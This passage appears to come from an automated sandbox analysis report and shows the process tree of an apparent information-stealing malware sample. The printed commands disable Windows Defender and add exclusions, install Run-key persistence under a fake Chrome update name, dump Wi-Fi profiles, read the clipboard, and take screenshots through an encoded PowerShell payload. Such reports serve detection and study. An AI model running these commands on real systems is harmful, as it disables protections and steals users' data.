PID 3108 wrote to memory of 1204	3108	cmd.exe	118
PID 3524 wrote to memory of 2444	3524	cmd.exe	119
PID 3524 wrote to memory of 2444	3524	cmd.exe	119

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:560
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1000

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:640

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:912

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:964

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1104
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3176
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5400

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1220

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1324

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1352
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3128

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1544

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1572

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1952

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:1288

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2084

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2228

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2292

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2300

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2492

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2560

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2576

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2588

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2712

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2872

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3144

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3260

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3404
- C:\Users\Admin\AppData\Local\Temp\main.exe
  "C:\Users\Admin\AppData\Local\Temp\main.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Users\Admin\AppData\Local\Temp\main.exe
    "C:\Users\Admin\AppData\Local\Temp\main.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI20042\Build.exe -pbeznogym
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4636
    - - C:\Users\Admin\AppData\Local\Temp\_MEI20042\Build.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI20042\Build.exe -pbeznogym
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4480
      - C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4956
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:4184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI49562\s.exe -pbeznogym
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\_MEI49562\s.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI49562\s.exe -pbeznogym
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4564
        
        C:\ProgramData\main.exe
        
        "C:\ProgramData\main.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3756
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpBAF3.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpBAF3.tmp.bat
        11⤵
        
        PID:6960
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 3756"
        12⤵
        Enumerates processes with tasklist
        
        PID:7056
        
        C:\Windows\system32\find.exe
        
        find ":"
        12⤵
        
        PID:7068
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        12⤵
        Delays execution with timeout.exe
        
        PID:7280
        
        C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:7432
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        13⤵
        
        PID:8072
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        14⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:9620
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5052
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:1860
        
        C:\ProgramData\setup.exe
        
        "C:\ProgramData\setup.exe"
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        
        PID:4664
      - C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1068
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1532
        
        C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        9⤵
        Deletes Windows Defender Definitions
        
        PID:5524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2756
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3524
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        8⤵
        
        PID:96
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:1524
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3748
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:1368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3108
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        9⤵
        
        PID:1204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        8⤵
        
        PID:4156
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        9⤵
        Gathers system information
        
        PID:2100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        8⤵
        
        PID:5064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3460
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gseuipki\gseuipki.cmdline"
        10⤵
        
        PID:4676
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB92.tmp" "c:\Users\Admin\AppData\Local\Temp\gseuipki\CSC9E783019C5454C6BAF304EA4AE69711C.TMP"
        11⤵
        
        PID:5348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:508
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:1584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:4892
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:10012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:5016
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:5136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:5160
        
        C:\Windows\system32\tree.com
